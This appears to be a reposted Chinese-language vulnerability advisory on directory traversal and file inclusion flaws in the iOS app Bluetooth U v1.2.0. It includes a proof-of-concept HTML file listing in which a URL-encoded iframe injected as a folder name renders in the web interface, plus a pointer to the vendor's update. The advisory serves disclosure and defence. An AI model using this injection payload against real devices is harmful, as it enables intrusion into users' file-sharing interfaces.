Index'模块多个目录遍历漏洞

发布日期：2013-10-17
更新日期：2013-10-20

受影响系统：
Apple Bluetooth U - Mobile Web Application
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 63194

Bluetooth U可确保设备之间文件传输的同步性，而不限制文件类型。

Bluetooth U v1.2.0  iOS移动应用（Apple iOS - iPad & iPhone）存在多个本地目录遍历及文件包含漏洞，远程攻击者通过含特制目录遍历序列的请求，利用此漏洞检索应用上下文中的本地文件。

<*来源：Benjamin Kunz Mejri
 
  链接：
        ?id=1111
*>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

The path/directory-traversl web vulnerability can be exploited by remote attackers without privileged application user
account and also
without user interaction. For demonstration or reproduce ...

PoC: Foldername - Index File Dir Listing (Wifi)

<table cellpadding="0" cellspacing="0">
<thead>
<tr><th><input
type="checkbox"></th><th>Name</th><th>Size</th><th>Modified Date</th><th>Delete</th></tr>
</thead>
<tbody><tr><td>
<input
value="%3Ciframe%20src%3D%3Fguid%3D%26type%3Dlist%26password%3D%26date%3DSun%20Oct%2013%202013%2017%3A46%3A15%20GMT%2B0200%3E"

onclick="selChkItem(this)" type="checkbox"></td>
<td><a
href="/%3Ciframe%20src%3D%3Fguid%3D%26type%3Dlist%26password%3D%26date%3DSun%20Oct%2013%202013%2017%3A46%3A15%20GMT%2B0200%3E
?guid=1520475B-0653-41FA-8072-CC31D2C5A8F2&type=child"><span><img
src="/Folder.png"
style="border:0;vertical-align:middle" ;=""></span><iframe src="https://www.linuxidc.com/?guid=&type=list&password=&date=Sun" oct="" 13=""
2013=""
17:46:15="" gmt+0200=""></a></td><td></td><td>2013-10-13 17:53:31</td><td><input type="button"
value="Delete"
onclick="DelegateData('/%3Ciframe%20src%3D%3Fguid%3D%26type%3Dlist%26password%3D%26date%3DSun%20Oct%2013%202013%2017%3A46%3A15%20GMT%2B0200%3E'
,'1520475B-0653-41FA-8072-CC31D2C5A8F2');" /></form></td></tr></tbody></table></iframe></a></td></tr><tr
class="shadow">
<td><input value="TEST23" type="checkbox"></td>

建议：
--------------------------------------------------------------------------------
厂商补丁：

Apple
-----
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

https://itunes.apple.com/de/app/bluetooth-u-share-files-photo/id526268815